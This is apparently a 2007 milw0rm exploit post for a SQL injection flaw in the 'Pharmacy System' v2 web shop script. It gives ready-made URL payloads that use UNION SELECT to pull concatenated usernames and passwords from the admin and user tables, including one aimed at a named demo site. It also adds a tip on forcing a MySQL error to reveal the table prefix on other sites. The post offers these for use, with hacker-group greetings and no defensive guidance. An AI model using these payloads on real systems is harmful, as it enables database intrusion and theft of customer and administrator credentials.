Pharmacy System 2.0 (index.php ID) Remote SQL Injection Vuln

[hex]

--==+================================================================================+==--

--==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==--

--==+================================================================================+==--

AUTHOR: t0pP8uZz & xprog

SCRIPT DOWNLOAD: PAY SCRIPT

SITE: http://www.netartmedia.net/pharmacysystem/

DORK: N/A

EXPLOITS:

EXPLOIT 1: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users

EXPLOIT 2: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_users

EXAMPLES:

EXAMPLE ON DEMO: http://www.wscreator.com/pharma1/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users

NOTE/TIP: Most sites will have diffrent table prefix, so table pharma1_admin_users probarly wont exist, to get the prefix

follow these steps, goto "http://server.com/index.php?page='" this should cause a mysql error and you will be able to

see the mysql query being used for the page variable. Simple replace the prefix from the error with then one in the injection

if you cant do that then dont use the exploit.

GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net

--==+================================================================================+==--

--==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==--

--==+================================================================================+==--

# milw0rm.com [2007-06-24]